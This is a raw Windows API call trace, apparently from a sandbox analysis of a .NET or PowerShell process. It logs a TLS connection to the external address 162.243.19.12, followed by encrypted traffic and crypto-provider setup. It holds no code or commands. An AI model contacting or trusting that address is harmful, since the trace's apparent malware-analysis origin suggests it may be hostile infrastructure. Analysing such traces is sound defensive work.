	[0064.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7d0
	[0064.115] ioctlsocket (in: s=0x7d4, cmd=-2147195266, argp=0x350199dbf8 | out: argp=0x350199dbf8) returned 0
	[0064.115] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d8
	[0064.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7dc
	[0064.116] ioctlsocket (in: s=0x7d8, cmd=-2147195266, argp=0x350199dbf8 | out: argp=0x350199dbf8) returned 0
	[0064.116] WSAIoctl (in: s=0x7d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x350199db38, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x350199db38, lpOverlapped=0x0) returned -1
	[0064.116] CoTaskMemAlloc (cb=0x204) returned 0x233e12da3b0
	[0064.116] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x233e12da3b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0064.116] CoTaskMemFree (pv=0x233e12da3b0) 
	[0064.116] WSAEventSelect (s=0x7d4, hEventObject=0x7d0, lNetworkEvents=512) returned 0
	[0064.116] WSAIoctl (in: s=0x7d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x350199db38, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x350199db38, lpOverlapped=0x0) returned -1
	[0064.116] CoTaskMemAlloc (cb=0x204) returned 0x233e12da3b0
	[0064.116] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x233e12da3b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0064.116] CoTaskMemFree (pv=0x233e12da3b0) 
	[0064.116] WSAEventSelect (s=0x7d8, hEventObject=0x7dc, lNetworkEvents=512) returned 0
	[0064.117] GetAdaptersAddresses () returned 0x6f
	[0064.119] LocalAlloc (uFlags=0x0, uBytes=0xc20) returned 0x233fc643100
	[0064.119] GetAdaptersAddresses () returned 0x0
	[0064.123] LocalFree (hMem=0x233fc643100) returned 0x0
	[0064.124] WSAConnect (in: s=0x7cc, name=0x233e44b6ae0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0064.231] closesocket (s=0x798) returned 0
	[0064.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199db58 | out: phkResult=0x350199db58*=0x798) returned 0x0
	[0064.253] RegQueryValueExW (in: hKey=0x798, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x350199dadc, lpData=0x0, lpcbData=0x350199dad8*=0x0 | out: lpType=0x350199dadc*=0x0, lpData=0x0, lpcbData=0x350199dad8*=0x0) returned 0x2
	[0064.253] RegCloseKey (hKey=0x798) returned 0x0
	[0064.259] EnumerateSecurityPackagesW (in: pcPackages=0x350199da58, ppPackageInfo=0x350199da50 | out: pcPackages=0x350199da58, ppPackageInfo=0x350199da50) returned 0x0
	[0064.261] lstrlenW (lpString="Negotiate") returned 9
	[0064.261] CoTaskMemAlloc (cb=0x16) returned 0x233e39ac300
	[0064.261] RtlMoveMemory (in: Destination=0x233e39ac300, Source=0x233e399faa0, Length=0x14 | out: Destination=0x233e39ac300) 
	[0064.261] CoTaskMemFree (pv=0x233e39ac300) 
	[0064.261] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0064.261] CoTaskMemAlloc (cb=0x3c) returned 0x233e3999bf0
	[0064.261] RtlMoveMemory (in: Destination=0x233e3999bf0, Source=0x233e399fab4, Length=0x3a | out: Destination=0x233e3999bf0) 
	[0064.261] CoTaskMemFree (pv=0x233e3999bf0) 
	[0064.261] lstrlenW (lpString="NegoExtender") returned 12
	[0064.261] CoTaskMemAlloc (cb=0x1c) returned 0x233e3a04dc0
	[0064.262] RtlMoveMemory (in: Destination=0x233e3a04dc0, Source=0x233e399faee, Length=0x1a | out: Destination=0x233e3a04dc0) 
	[0064.262] CoTaskMemFree (pv=0x233e3a04dc0) 
	[0064.262] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0064.262] CoTaskMemAlloc (cb=0x3e) returned 0x233e399a190
	[0064.262] RtlMoveMemory (in: Destination=0x233e399a190, Source=0x233e399fb08, Length=0x3c | out: Destination=0x233e399a190) 
	[0064.262] CoTaskMemFree (pv=0x233e399a190) 
	[0064.262] lstrlenW (lpString="Kerberos") returned 8
	[0064.262] CoTaskMemAlloc (cb=0x14) returned 0x233e39ac400
	[0064.262] RtlMoveMemory (in: Destination=0x233e39ac400, Source=0x233e399fb44, Length=0x12 | out: Destination=0x233e39ac400) 
	[0064.262] CoTaskMemFree (pv=0x233e39ac400) 
	[0064.262] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0064.262] CoTaskMemAlloc (cb=0x32) returned 0x233fc6385a0
	[0064.262] RtlMoveMemory (in: Destination=0x233fc6385a0, Source=0x233e399fb56, Length=0x30 | out: Destination=0x233fc6385a0) 
	[0064.262] CoTaskMemFree (pv=0x233fc6385a0) 
	[0064.262] lstrlenW (lpString="NTLM") returned 4
	[0064.262] CoTaskMemAlloc (cb=0xc) returned 0x233e39ac3c0
	[0064.262] RtlMoveMemory (in: Destination=0x233e39ac3c0, Source=0x233e399fb86, Length=0xa | out: Destination=0x233e39ac3c0) 
	[0064.262] CoTaskMemFree (pv=0x233e39ac3c0) 
	[0064.262] lstrlenW (lpString="NTLM Security Package") returned 21
	[0064.262] CoTaskMemAlloc (cb=0x2e) returned 0x233fc638920
	[0064.262] RtlMoveMemory (in: Destination=0x233fc638920, Source=0x233e399fb90, Length=0x2c | out: Destination=0x233fc638920) 
	[0064.262] CoTaskMemFree (pv=0x233fc638920) 
	[0064.262] lstrlenW (lpString="TSSSP") returned 5
	[0064.262] CoTaskMemAlloc (cb=0xe) returned 0x233e39ac3a0
	[0064.262] RtlMoveMemory (in: Destination=0x233e39ac3a0, Source=0x233e399fbbc, Length=0xc | out: Destination=0x233e39ac3a0) 
	[0064.262] CoTaskMemFree (pv=0x233e39ac3a0) 
	[0064.262] lstrlenW (lpString="TS Service Security Package") returned 27
	[0064.262] CoTaskMemAlloc (cb=0x3a) returned 0x233e399a190
	[0064.262] RtlMoveMemory (in: Destination=0x233e399a190, Source=0x233e399fbc8, Length=0x38 | out: Destination=0x233e399a190) 
	[0064.262] CoTaskMemFree (pv=0x233e399a190) 
	[0064.262] lstrlenW (lpString="pku2u") returned 5
	[0064.262] CoTaskMemAlloc (cb=0xe) returned 0x233e39ac480
	[0064.262] RtlMoveMemory (in: Destination=0x233e39ac480, Source=0x233e399fc00, Length=0xc | out: Destination=0x233e39ac480) 
	[0064.262] CoTaskMemFree (pv=0x233e39ac480) 
	[0064.263] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0064.263] CoTaskMemAlloc (cb=0x30) returned 0x233fc638460
	[0064.263] RtlMoveMemory (in: Destination=0x233fc638460, Source=0x233e399fc0c, Length=0x2e | out: Destination=0x233fc638460) 
	[0064.263] CoTaskMemFree (pv=0x233fc638460) 
	[0064.263] lstrlenW (lpString="CloudAP") returned 7
	[0064.263] CoTaskMemAlloc (cb=0x12) returned 0x233e39ac040
	[0064.263] RtlMoveMemory (in: Destination=0x233e39ac040, Source=0x233e399fc3a, Length=0x10 | out: Destination=0x233e39ac040) 
	[0064.263] CoTaskMemFree (pv=0x233e39ac040) 
	[0064.263] lstrlenW (lpString="Cloud AP Security Package") returned 25
	[0064.263] CoTaskMemAlloc (cb=0x36) returned 0x233fc638c20
	[0064.263] RtlMoveMemory (in: Destination=0x233fc638c20, Source=0x233e399fc4a, Length=0x34 | out: Destination=0x233fc638c20) 
	[0064.263] CoTaskMemFree (pv=0x233fc638c20) 
	[0064.263] lstrlenW (lpString="WDigest") returned 7
	[0064.263] CoTaskMemAlloc (cb=0x12) returned 0x233e39ac2c0
	[0064.263] RtlMoveMemory (in: Destination=0x233e39ac2c0, Source=0x233e399fc7e, Length=0x10 | out: Destination=0x233e39ac2c0) 
	[0064.263] CoTaskMemFree (pv=0x233e39ac2c0) 
	[0064.263] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0064.263] CoTaskMemAlloc (cb=0x46) returned 0x233e399a2d0
	[0064.263] RtlMoveMemory (in: Destination=0x233e399a2d0, Source=0x233e399fc8e, Length=0x44 | out: Destination=0x233e399a2d0) 
	[0064.263] CoTaskMemFree (pv=0x233e399a2d0) 
	[0064.263] lstrlenW (lpString="Schannel") returned 8
	[0064.263] CoTaskMemAlloc (cb=0x14) returned 0x233e39ac680
	[0064.263] RtlMoveMemory (in: Destination=0x233e39ac680, Source=0x233e399fcd2, Length=0x12 | out: Destination=0x233e39ac680) 
	[0064.263] CoTaskMemFree (pv=0x233e39ac680) 
	[0064.263] lstrlenW (lpString="Schannel Security Package") returned 25
	[0064.263] CoTaskMemAlloc (cb=0x36) returned 0x233fc638ae0
	[0064.263] RtlMoveMemory (in: Destination=0x233fc638ae0, Source=0x233e399fce4, Length=0x34 | out: Destination=0x233fc638ae0) 
	[0064.264] CoTaskMemFree (pv=0x233fc638ae0) 
	[0064.264] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0064.264] CoTaskMemAlloc (cb=0x5c) returned 0x233e3a07530
	[0064.264] RtlMoveMemory (in: Destination=0x233e3a07530, Source=0x233e399fd18, Length=0x5a | out: Destination=0x233e3a07530) 
	[0064.264] CoTaskMemFree (pv=0x233e3a07530) 
	[0064.264] lstrlenW (lpString="Schannel Security Package") returned 25
	[0064.264] CoTaskMemAlloc (cb=0x36) returned 0x233fc638420
	[0064.264] RtlMoveMemory (in: Destination=0x233fc638420, Source=0x233e399fd72, Length=0x34 | out: Destination=0x233fc638420) 
	[0064.264] CoTaskMemFree (pv=0x233fc638420) 
	[0064.264] lstrlenW (lpString="CREDSSP") returned 7
	[0064.264] CoTaskMemAlloc (cb=0x12) returned 0x233e39ac300
	[0064.264] RtlMoveMemory (in: Destination=0x233e39ac300, Source=0x233e399fda6, Length=0x10 | out: Destination=0x233e39ac300) 
	[0064.264] CoTaskMemFree (pv=0x233e39ac300) 
	[0064.264] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0064.264] CoTaskMemAlloc (cb=0x4a) returned 0x233e399d2a0
	[0064.264] RtlMoveMemory (in: Destination=0x233e399d2a0, Source=0x233e399fdb6, Length=0x48 | out: Destination=0x233e399d2a0) 
	[0064.264] CoTaskMemFree (pv=0x233e399d2a0) 
	[0064.264] FreeContextBuffer (in: pvContextBuffer=0x233e399f940 | out: pvContextBuffer=0x233e399f940) returned 0x0
	[0064.267] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.267] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d538 | out: TokenHandle=0x350199d538*=0x798) returned 1
	[0064.269] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x233e44b9510, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x350199d448, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x350199d438, ptsExpiry=0x350199d430 | out: phCredential=0x350199d438, ptsExpiry=0x350199d430) returned 0x0
	[0064.271] InitializeSecurityContextW (in: phCredential=0x350199d640, phContext=0x0, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199d630, pOutput=0x233e44bbd58, pfContextAttr=0x350199d628, ptsExpiry=0x350199d620 | out: phNewContext=0x350199d630, pOutput=0x233e44bbd58, pfContextAttr=0x350199d628, ptsExpiry=0x350199d620) returned 0x90312
	[0064.272] FreeContextBuffer (in: pvContextBuffer=0x233e39cf510 | out: pvContextBuffer=0x233e39cf510) returned 0x0
	[0064.276] send (in: s=0x7cc, buf=0x233e44bbe28*, len=125, flags=0 | out: buf=0x233e44bbe28*) returned 125
	[0064.277] recv (in: s=0x7cc, buf=0x233e44bbe28, len=5, flags=0 | out: buf=0x233e44bbe28*) returned 5
	[0064.384] recv (in: s=0x7cc, buf=0x233e44bbe2d, len=61, flags=0 | out: buf=0x233e44bbe2d*) returned 61
	[0064.385] InitializeSecurityContextW (in: phCredential=0x350199d570, phContext=0x350199d820, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bc140, Reserved2=0x0, phNewContext=0x350199d560, pOutput=0x233e44bc160, pfContextAttr=0x350199d558, ptsExpiry=0x350199d550 | out: phNewContext=0x350199d560, pOutput=0x233e44bc160, pfContextAttr=0x350199d558, ptsExpiry=0x350199d550) returned 0x90312
	[0064.386] recv (in: s=0x7cc, buf=0x233e44bc250, len=5, flags=0 | out: buf=0x233e44bc250*) returned 5
	[0064.386] recv (in: s=0x7cc, buf=0x233e44bc275, len=1575, flags=0 | out: buf=0x233e44bc275*) returned 1575
	[0064.386] InitializeSecurityContextW (in: phCredential=0x350199d4b0, phContext=0x350199d760, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bc970, Reserved2=0x0, phNewContext=0x350199d4a0, pOutput=0x233e44bc990, pfContextAttr=0x350199d498, ptsExpiry=0x350199d490 | out: phNewContext=0x350199d4a0, pOutput=0x233e44bc990, pfContextAttr=0x350199d498, ptsExpiry=0x350199d490) returned 0x90312
	[0064.387] recv (in: s=0x7cc, buf=0x233e44bca80, len=5, flags=0 | out: buf=0x233e44bca80*) returned 5
	[0064.387] recv (in: s=0x7cc, buf=0x233e44bcaa5, len=331, flags=0 | out: buf=0x233e44bcaa5*) returned 331
	[0064.387] InitializeSecurityContextW (in: phCredential=0x350199d3f0, phContext=0x350199d6a0, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bccc0, Reserved2=0x0, phNewContext=0x350199d3e0, pOutput=0x233e44bcce0, pfContextAttr=0x350199d3d8, ptsExpiry=0x350199d3d0 | out: phNewContext=0x350199d3e0, pOutput=0x233e44bcce0, pfContextAttr=0x350199d3d8, ptsExpiry=0x350199d3d0) returned 0x90312
	[0064.387] recv (in: s=0x7cc, buf=0x233e44bcdd0, len=5, flags=0 | out: buf=0x233e44bcdd0*) returned 5
	[0064.388] recv (in: s=0x7cc, buf=0x233e44bcdf5, len=4, flags=0 | out: buf=0x233e44bcdf5*) returned 4
	[0064.388] InitializeSecurityContextW (in: phCredential=0x350199d330, phContext=0x350199d5e0, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bced0, Reserved2=0x0, phNewContext=0x350199d320, pOutput=0x233e44bcef0, pfContextAttr=0x350199d318, ptsExpiry=0x350199d310 | out: phNewContext=0x350199d320, pOutput=0x233e44bcef0, pfContextAttr=0x350199d318, ptsExpiry=0x350199d310) returned 0x90312
	[0064.417] FreeContextBuffer (in: pvContextBuffer=0x233e39a68e0 | out: pvContextBuffer=0x233e39a68e0) returned 0x0
	[0064.417] send (in: s=0x7cc, buf=0x233e44bcfc0*, len=134, flags=0 | out: buf=0x233e44bcfc0*) returned 134
	[0064.417] recv (in: s=0x7cc, buf=0x233e44bcfc0, len=5, flags=0 | out: buf=0x233e44bcfc0*) returned 5
	[0064.523] recv (in: s=0x7cc, buf=0x233e44bd085, len=218, flags=0 | out: buf=0x233e44bd085*) returned 218
	[0064.523] InitializeSecurityContextW (in: phCredential=0x350199d270, phContext=0x350199d520, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bd230, Reserved2=0x0, phNewContext=0x350199d260, pOutput=0x233e44bd250, pfContextAttr=0x350199d258, ptsExpiry=0x350199d250 | out: phNewContext=0x350199d260, pOutput=0x233e44bd250, pfContextAttr=0x350199d258, ptsExpiry=0x350199d250) returned 0x90312
	[0064.523] recv (in: s=0x7cc, buf=0x233e44bd340, len=5, flags=0 | out: buf=0x233e44bd340*) returned 5
	[0064.523] recv (in: s=0x7cc, buf=0x233e44bd365, len=1, flags=0 | out: buf=0x233e44bd365*) returned 1
	[0064.523] InitializeSecurityContextW (in: phCredential=0x350199d1b0, phContext=0x350199d460, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bd438, Reserved2=0x0, phNewContext=0x350199d1a0, pOutput=0x233e44bd458, pfContextAttr=0x350199d198, ptsExpiry=0x350199d190 | out: phNewContext=0x350199d1a0, pOutput=0x233e44bd458, pfContextAttr=0x350199d198, ptsExpiry=0x350199d190) returned 0x90312
	[0064.523] recv (in: s=0x7cc, buf=0x233e44bd548, len=5, flags=0 | out: buf=0x233e44bd548*) returned 5
	[0064.524] recv (in: s=0x7cc, buf=0x233e44bd56d, len=48, flags=0 | out: buf=0x233e44bd56d*) returned 48
	[0064.524] InitializeSecurityContextW (in: phCredential=0x350199d0f0, phContext=0x350199d3a0, pTargetName=0x233e44a8690, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e44bd670, Reserved2=0x0, phNewContext=0x350199d0e0, pOutput=0x233e44bd690, pfContextAttr=0x350199d0d8, ptsExpiry=0x350199d0d0 | out: phNewContext=0x350199d0e0, pOutput=0x233e44bd690, pfContextAttr=0x350199d0d8, ptsExpiry=0x350199d0d0) returned 0x0
	[0064.525] QueryContextAttributesW (in: phContext=0x350199d350, ulAttribute=0x4, pBuffer=0x233e44bd7a8 | out: pBuffer=0x233e44bd7a8) returned 0x0
	[0064.525] QueryContextAttributesW (in: phContext=0x350199d350, ulAttribute=0x5a, pBuffer=0x233e44bd828 | out: pBuffer=0x233e44bd828) returned 0x0
	[0064.528] QueryContextAttributesW (in: phContext=0x350199d200, ulAttribute=0x53, pBuffer=0x233e44bdb78 | out: pBuffer=0x233e44bdb78) returned 0x0
	[0064.533] CertDuplicateCertificateContext (pCertContext=0x233fc63eb70) returned 0x233fc63eb70
	[0064.535] CertDuplicateStore (hCertStore=0x233e3927830) returned 0x233e3927830
	[0064.535] CertEnumCertificatesInStore (hCertStore=0x233e3927830, pPrevCertContext=0x0) returned 0x233fc63eb70
	[0064.536] CertDuplicateCertificateContext (pCertContext=0x233fc63eb70) returned 0x233fc63eb70
	[0064.536] CertEnumCertificatesInStore (hCertStore=0x233e3927830, pPrevCertContext=0x233fc63eb70) returned 0x0
	[0064.536] CertCloseStore (hCertStore=0x233e3927830, dwFlags=0x0) returned 1
	[0064.536] CertFreeCertificateContext (pCertContext=0x233fc63eb70) returned 1
	[0064.540] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233e3926720
	[0064.542] CertAddCRLLinkToStore (in: hCertStore=0x233e3926720, pCrlContext=0x233fc63eb70, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0064.544] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc63eb70, pTime=0x350199d208, hAdditionalStore=0x233e3926720, pChainPara=0x350199d210, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199d200 | out: ppChainContext=0x350199d200) returned 1
	[0064.679] CertDuplicateCertificateChain (pChainContext=0x233fc700e50) returned 0x233fc700e50
	[0064.680] CertDuplicateCertificateContext (pCertContext=0x233fc63eb70) returned 0x233fc63eb70
	[0064.681] CertDuplicateCertificateContext (pCertContext=0x233fc67fbb0) returned 0x233fc67fbb0
	[0064.682] CertDuplicateCertificateContext (pCertContext=0x233fc67f830) returned 0x233fc67f830
	[0064.682] CertFreeCertificateChain (pChainContext=0x233fc700e50) 
	[0064.683] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc700e50, pPolicyPara=0x350199d388, pPolicyStatus=0x350199d368 | out: pPolicyStatus=0x350199d368) returned 1
	[0064.683] SetLastError (dwErrCode=0x0) 
	[0064.686] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc700e50, pPolicyPara=0x350199d460, pPolicyStatus=0x350199d448 | out: pPolicyStatus=0x350199d448) returned 1
	[0064.717] CertFreeCertificateChain (pChainContext=0x233fc700e50) 
	[0064.717] CertFreeCertificateContext (pCertContext=0x233fc63eb70) returned 1
	[0064.720] EncryptMessage (in: phContext=0x350199da70, fQOP=0x0, pMessage=0x233e44c1228, MessageSeqNo=0x0 | out: pMessage=0x233e44c1228) returned 0x0
	[0064.720] send (in: s=0x7cc, buf=0x233e44c0ee8*, len=245, flags=0 | out: buf=0x233e44c0ee8*) returned 245
	[0064.729] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0064.730] recv (in: s=0x7cc, buf=0x233e44c1388, len=5, flags=0 | out: buf=0x233e44c1388*) returned 5
	[0065.236] recv (in: s=0x7cc, buf=0x233e44c13ad, len=336, flags=0 | out: buf=0x233e44c13ad*) returned 336
	[0065.239] DecryptMessage (in: phContext=0x350199d630, pMessage=0x233e44c1610, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e44c1610, pfQOP=0x0) returned 0x0
	[0065.254] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0065.256] recv (in: s=0x7cc, buf=0x233e44c13a8, len=5, flags=0 | out: buf=0x233e44c13a8*) returned 5
	[0065.256] recv (in: s=0x7cc, buf=0x233e44c577d, len=5504, flags=0 | out: buf=0x233e44c577d*) returned 5504
	[0065.256] DecryptMessage (in: phContext=0x350199dc00, pMessage=0x233e44c6e10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e44c6e10, pfQOP=0x0) returned 0x0
	[0065.257] SetEvent (hEvent=0x6b4) returned 1
	[0065.346] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0065.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.347] CoTaskMemFree (pv=0x233e39e90d0) 
	[0065.868] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0065.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.868] CoTaskMemFree (pv=0x233e39e90d0) 
	[0065.964] VirtualQuery (in: lpAddress=0x199d690, lpBuffer=0x350199e550, dwLength=0x30 | out: lpBuffer=0x350199e550*(BaseAddress=0x199d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e3000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0066.086] CoGetContextToken (in: pToken=0x350199a830 | out: pToken=0x350199a830) returned 0x0
	[0066.086] CoGetObjectContext (in: riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x233fc67c2e8 | out: ppv=0x233fc67c2e8*=0x233e121be18) returned 0x0
	[0066.087] CoGetContextToken (in: pToken=0x350199a800 | out: pToken=0x350199a800) returned 0x0
	[0066.088] CoGetContextToken (in: pToken=0x350199ad00 | out: pToken=0x350199ad00) returned 0x0
	[0066.088] CoGetContextToken (in: pToken=0x350199ac40 | out: pToken=0x350199ac40) returned 0x0
	[0066.089] CoGetContextToken (in: pToken=0x350199ae60 | out: pToken=0x350199ae60) returned 0x0
	[0066.089] CoGetContextToken (in: pToken=0x350199ada0 | out: pToken=0x350199ada0) returned 0x0
	[0066.111] CAddrControl::AddRef () returned 0x1
	[0066.151] CoGetContextToken (in: pToken=0x350199a810 | out: pToken=0x350199a810) returned 0x0
	[0066.151] CoGetContextToken (in: pToken=0x350199a7e0 | out: pToken=0x350199a7e0) returned 0x0
	[0066.151] CoGetContextToken (in: pToken=0x350199ace0 | out: pToken=0x350199ace0) returned 0x0
	[0066.151] CoGetContextToken (in: pToken=0x350199ac20 | out: pToken=0x350199ac20) returned 0x0
	[0066.153] CoGetContextToken (in: pToken=0x350199afe0 | out: pToken=0x350199afe0) returned 0x0
	[0066.153] CoGetContextToken (in: pToken=0x350199af20 | out: pToken=0x350199af20) returned 0x0
	[0066.153] CoGetContextToken (in: pToken=0x350199a830 | out: pToken=0x350199a830) returned 0x0
	[0066.154] CoGetContextToken (in: pToken=0x350199a800 | out: pToken=0x350199a800) returned 0x0
	[0066.154] CoGetContextToken (in: pToken=0x350199ad00 | out: pToken=0x350199ad00) returned 0x0
	[0066.154] CoGetContextToken (in: pToken=0x350199ac40 | out: pToken=0x350199ac40) returned 0x0
	[0066.155] CoGetContextToken (in: pToken=0x350199af70 | out: pToken=0x350199af70) returned 0x0
	[0066.155] CoGetContextToken (in: pToken=0x350199aeb0 | out: pToken=0x350199aeb0) returned 0x0
	[0066.162] CoTaskMemAlloc (cb=0xa8) returned 0x233e39a7f90
	[0066.162] RtlMoveMemory (in: Destination=0x233e39a7f90, Source=0x233e4471a40, Length=0xa6 | out: Destination=0x233e39a7f90) 
	[0066.162] CoTaskMemFree (pv=0x233e39a7f90) 
	[0066.275] CoGetContextToken (in: pToken=0x350199a9c0 | out: pToken=0x350199a9c0) returned 0x0
	[0066.275] CoGetContextToken (in: pToken=0x350199a990 | out: pToken=0x350199a990) returned 0x0
	[0066.275] CoGetContextToken (in: pToken=0x350199ae90 | out: pToken=0x350199ae90) returned 0x0
	[0066.275] CoGetContextToken (in: pToken=0x350199add0 | out: pToken=0x350199add0) returned 0x0
	[0066.275] CoGetContextToken (in: pToken=0x350199aff0 | out: pToken=0x350199aff0) returned 0x0
	[0066.275] CoGetContextToken (in: pToken=0x350199af30 | out: pToken=0x350199af30) returned 0x0
	[0066.280] CoGetContextToken (in: pToken=0x350199a9a0 | out: pToken=0x350199a9a0) returned 0x0
	[0066.281] CoGetContextToken (in: pToken=0x350199a970 | out: pToken=0x350199a970) returned 0x0
	[0066.281] CoGetContextToken (in: pToken=0x350199ae70 | out: pToken=0x350199ae70) returned 0x0
	[0066.281] CoGetContextToken (in: pToken=0x350199adb0 | out: pToken=0x350199adb0) returned 0x0
	[0066.281] CoGetContextToken (in: pToken=0x350199b170 | out: pToken=0x350199b170) returned 0x0
	[0066.281] CoGetContextToken (in: pToken=0x350199b0b0 | out: pToken=0x350199b0b0) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199a9c0 | out: pToken=0x350199a9c0) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199a990 | out: pToken=0x350199a990) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199ae90 | out: pToken=0x350199ae90) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199add0 | out: pToken=0x350199add0) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199b100 | out: pToken=0x350199b100) returned 0x0
	[0066.282] CoGetContextToken (in: pToken=0x350199b040 | out: pToken=0x350199b040) returned 0x0
	[0066.289] CoTaskMemAlloc (cb=0xa0) returned 0x233e39a6db0
	[0066.289] RtlMoveMemory (in: Destination=0x233e39a6db0, Source=0x233e4473118, Length=0x9e | out: Destination=0x233e39a6db0) 
	[0066.289] CoTaskMemFree (pv=0x233e39a6db0) 
	[0066.361] CryptAcquireContextW (in: phProv=0x350199c9c0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x350199c9c0*=0x233fc6ef160) returned 1
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f690
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f690, pdwDataLen=0x350199c818, dwFlags=0x1 | out: pbData=0x233fc64f690, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemFree (pv=0x233fc64f690) 
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemFree (pv=0x233fc64f600) 
